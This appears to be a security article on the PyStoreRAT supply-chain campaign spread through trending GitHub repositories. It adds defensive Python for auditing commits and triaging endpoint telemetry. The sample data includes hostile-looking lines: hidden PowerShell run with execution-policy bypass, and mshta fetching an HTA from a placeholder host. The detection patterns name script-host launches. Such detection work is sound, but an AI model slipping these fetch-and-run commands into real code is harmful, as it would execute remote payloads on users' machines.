A cunning new supply chain attack is specifically targeting Information Technology (IT) administrators and Open Source Intelligence (OSINT) professionals. This sophisticated campaign is leveraging the trusted platform of GitHub to distribute a stealthy backdoor known as PyStoreRAT. The attackers are employing a high level of planning, using dormant accounts to bypass suspicion and deliver malicious payloads directly to technical users seeking legitimate software solutions.
The operation begins with the reactivation of long-dormant GitHub accounts, a tactic likely chosen to capitalize on their existing reputation within the developer community. These reanimated accounts then begin publishing seemingly polished, AI-generated software projects. These repositories are frequently disguised as helpful tools, such as cryptocurrency bots, GPT wrappers, and other utilities related to cybersecurity. The use of AI-generated content enables threat actors to rapidly populate these repositories with credible-looking code, creating an illusion of ongoing activity and maintenance.
Morphisec analysts brought this campaign to light after noticing that several of these repositories had unexpectedly climbed into GitHub’s trending lists. This heightened visibility placed the malicious tools directly in the path of their intended targets. Once these repositories gained traction and a measure of trust within the community, the attackers introduced subtle “maintenance” commits. These updates contained a previously undocumented JavaScript and HTA backdoor, which the researchers have subsequently named PyStoreRAT.
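Because the backdoor arrived in a later "maintenance" commit rather than in the initial release, vetting a repository once at adoption time does not cover its updates. The Python below is an added example (not code from this article or from Morphisec) of a pre-update review step: it walks a commit's file changes and flags additions that resemble the delivery pattern described above, namely new Windows script files or code that launches a script host or a hidden PowerShell. The `FileChange` records, the heuristics and the placeholder URL on `example.invalid` are constructed for this illustration and are not taken from the campaign.

```python
"""Review a commit's file changes for script-host delivery patterns.
Added example: the FileChange records below are constructed, not taken
from any real repository, and the URL is a placeholder."""
import re
from dataclasses import dataclass

# File types that execute through a Windows script host when launched.
SCRIPT_EXTENSIONS = (".hta", ".js", ".jse", ".vbs", ".vbe", ".wsf")

# Content heuristics a reviewer wants surfaced in a "utility" project.
SUSPICIOUS_PATTERNS = {
    "script_host_launch": re.compile(r"\b(mshta|wscript|cscript)(\.exe)?\b", re.I),
    "hidden_powershell": re.compile(
        r"powershell[^\n]*-(w(indowstyle)?\s+hidden|ep\s+bypass|enc(odedcommand)?\b)", re.I),
}
# Decode-then-execute is checked as two independent matches so that the
# order of the calls in the file does not matter.
DECODE_CALL = re.compile(r"\b(b64decode|atob|FromBase64String)\s*\(", re.I)
EXEC_CALL = re.compile(r"\b(exec|eval|os\.system|subprocess\.(run|Popen|call))\s*\(", re.I)


@dataclass
class FileChange:
    path: str
    status: str   # "A" added, "M" modified, "D" deleted
    content: str  # file content after the change ("" for deletions)


@dataclass
class Finding:
    path: str
    reason: str


def audit_changes(changes):
    """Return a Finding for every change that matches a heuristic, in order."""
    findings = []
    for ch in changes:
        if ch.status == "D":
            continue  # a deletion carries no new code to review
        if ch.status == "A" and ch.path.lower().endswith(SCRIPT_EXTENSIONS):
            findings.append(Finding(ch.path, "new_script_file"))
        for name, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(ch.content):
                findings.append(Finding(ch.path, name))
        if DECODE_CALL.search(ch.content) and EXEC_CALL.search(ch.content):
            findings.append(Finding(ch.path, "decode_then_exec"))
    return findings


# Constructed "maintenance commit" of a trading-bot project: two harmless
# edits, one modified installer and two additions worth a reviewer's time.
SAMPLE_COMMIT = [
    FileChange("README.md", "M", "# Crypto trading bot\n\nFixed typos in setup steps.\n"),
    FileChange("bot/strategy.py", "M", "def rebalance(portfolio):\n    return portfolio\n"),
    FileChange("setup.py", "M",
               "import os\n"
               "os.system('powershell -w hidden -ep bypass -File install.ps1')\n"),
    FileChange("bot/utils/update.py", "A",
               "import subprocess\n"
               "# placeholder URL, constructed for this example\n"
               "subprocess.run(['mshta.exe', 'https://example.invalid/update.hta'])\n"),
    FileChange("bot/assets/theme.hta", "A", "<html><script>/* stub */</script></html>\n"),
]

if __name__ == "__main__":
    for f in audit_changes(SAMPLE_COMMIT):
        print(f"{f.reason:24} {f.path}")
```

In practice the change list would be built from `git diff --name-status <old>..<new>` plus the post-change file contents (an assumed workflow, not something the article prescribes). The rules are heuristics that direct a reviewer's attention; a clean result does not show that an update is safe, and a hit on `script_host_launch` in a project that legitimately automates Windows should be read in context rather than treated as a verdict.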
PyStoreRAT: A Deeper Look into the Stealthy Backdoor
PyStoreRAT is engineered for long-term persistence and data exfiltration. Upon successful installation, it functions as a multi-purpose loader, capable of profiling the victim’s system and subsequently deploying additional malicious payloads. One of the primary payloads observed in conjunction with PyStoreRAT is the Rhadamanthys stealer, a tool specifically designed to exfiltrate sensitive information. Furthermore, the malware exhibits the capability to propagate itself through removable drives, significantly increasing its potential to spread undetected across an organization’s internal network.
A critical characteristic of PyStoreRAT is its adaptive evasion techniques. The malware meticulously checks for the presence of specific antivirus products, including notable security solutions like CrowdStrike Falcon and ReasonLabs. Should these defenses be detected, PyStoreRAT modifies its execution strategy, opting for alternative launch paths to circumvent detection and avoid triggering security alerts. This dynamic behavior makes traditional signature-based detection methods less effective.
The command-and-control (C2) infrastructure supporting this entire campaign is designed for resilience and adaptability. It employs a rotating set of nodes, which facilitates seamless updates to the malware’s payload and operational directives. This architectural design makes it considerably more challenging for cybersecurity defenders to dismantle the operation, as the infrastructure can swiftly pivot to new, unaffected nodes. Examination of the codebase has also revealed linguistic artifacts, such as Russian strings, which may indicate a specific geographic origin or a targeted operational scope.
In response to these evolving threats, cybersecurity experts emphasize the importance of behavior-based defense strategies. Relying solely on static signatures for detection is increasingly insufficient against sophisticated malware like PyStoreRAT. Organizations are encouraged to monitor for unusual network activity, process execution anomalies, and suspicious file system changes that indicate potential compromise, even when no known malware signature matches.
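The article recommends watching process execution, network activity and file system changes rather than relying on signatures. As an added example of what that looks like in practice (not code from the article or from Morphisec), the Python below applies a few behavioral rules to constructed endpoint telemetry and correlates descendants of a flagged process so that later file and network events stay attributed to the same chain. The rules correspond to the HTA/JavaScript launch, the C2 traffic and the removable-drive propagation described above; the event schema, field names, the list of developer-tool parent processes and the sample IPs, paths and PIDs are all assumptions chosen for this illustration and do not reflect any EDR product's format.

```python
"""Behavior-based triage of endpoint telemetry.  Added example: the event
schema and the sample events below are constructed for illustration and
do not reflect any EDR product's format or real observed activity."""
import re

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
# Parents from which a script host is not expected; an analyst assumption
# to tune per environment (developer tooling is the relevant set here).
DEV_PARENTS = {"python.exe", "pythonw.exe", "node.exe", "code.exe", "git.exe"}
SCRIPT_EXT = re.compile(r"\.(hta|js|jse|vbs|vbe|wsf|lnk)$", re.I)
REMOTE_URL = re.compile(r"https?://", re.I)


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(events):
    """Apply the rules in event order; return (alerts, flagged_pids).

    Each alert is (rule, pid, detail).  A process is flagged when any rule
    fires on it, and a child of a flagged process is flagged in turn, so
    the chain's later file and network events are attributed to it.
    """
    alerts, flagged = [], set()

    def hit(rule, pid, detail):
        alerts.append((rule, pid, detail))
        flagged.add(pid)

    for ev in events:
        pid, image = ev["pid"], basename(ev["image"])
        if ev["type"] == "process":
            parent = basename(ev["parent_image"])
            if image in SCRIPT_HOSTS and parent in DEV_PARENTS:
                hit("script_host_from_dev_tool", pid, f"{parent} -> {image}")
            if image == "mshta.exe" and REMOTE_URL.search(ev["cmdline"]):
                hit("mshta_remote_url", pid, ev["cmdline"])
            if ev.get("parent_pid") in flagged:
                hit("child_of_flagged_process", pid, f"parent pid {ev['parent_pid']}")
        elif ev["type"] == "network" and image in SCRIPT_HOSTS:
            hit("script_host_network", pid, f"{ev['dest']}:{ev['port']}")
        elif ev["type"] == "file" and ev.get("removable") and SCRIPT_EXT.search(ev["path"]):
            hit("script_written_to_removable", pid, ev["path"])
    return alerts, flagged


# Constructed telemetry: a Python project run from an editor launches mshta
# against a remote HTA, which talks out, spawns wscript and drops a shortcut
# on a removable drive.  The last event is a benign baseline for contrast.
SAMPLE_EVENTS = [
    {"type": "process", "pid": 4100, "parent_pid": 900, "image": r"C:\Python311\python.exe",
     "parent_image": r"C:\Program Files\Microsoft VS Code\Code.exe", "cmdline": "python bot.py"},
    {"type": "process", "pid": 4188, "parent_pid": 4100, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Python311\python.exe",
     "cmdline": "mshta.exe https://example.invalid/update.hta"},  # placeholder URL
    {"type": "network", "pid": 4188, "image": r"C:\Windows\System32\mshta.exe",
     "dest": "203.0.113.7", "port": 443},  # documentation-range IP, constructed
    {"type": "process", "pid": 4220, "parent_pid": 4188, "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "wscript.exe //e:jscript C:\\Users\\u\\AppData\\Local\\Temp\\s.js"},
    {"type": "file", "pid": 4220, "image": r"C:\Windows\System32\wscript.exe",
     "path": r"E:\Documents.lnk", "removable": True},
    {"type": "process", "pid": 5000, "parent_pid": 900, "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "wscript.exe C:\\Scripts\\backup.vbs"},
]

if __name__ == "__main__":
    found, pids = triage(SAMPLE_EVENTS)
    for rule, pid, detail in found:
        print(f"{rule:30} pid={pid} {detail}")
    print("flagged pids:", sorted(pids))
```

None of these rules depends on a hash or a file name, which is the point the article makes about signature-only detection: a rebuilt payload or a fresh C2 node leaves the parent-child relationship, the outbound connection from a script host and the write to removable media unchanged. The `DEV_PARENTS` set is where most tuning happens; a team that genuinely drives `cscript.exe` from build scripts will want to narrow it or add a command-line allowlist.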
The ongoing nature of this sophisticated supply chain attack suggests that threat actors will continue to refine their methods for evading detection and exploiting trusted platforms like GitHub. The continued development and deployment of AI-generated code in malicious campaigns represent a growing concern for the cybersecurity landscape. Professionals in IT and OSINT fields should maintain heightened vigilance and implement robust security practices, including regular software updates, thorough code reviews, and comprehensive endpoint detection and response (EDR) solutions. As this threat evolves, monitoring for updates to PyStoreRAT’s capabilities and the associated C2 infrastructure will be crucial for effective defense.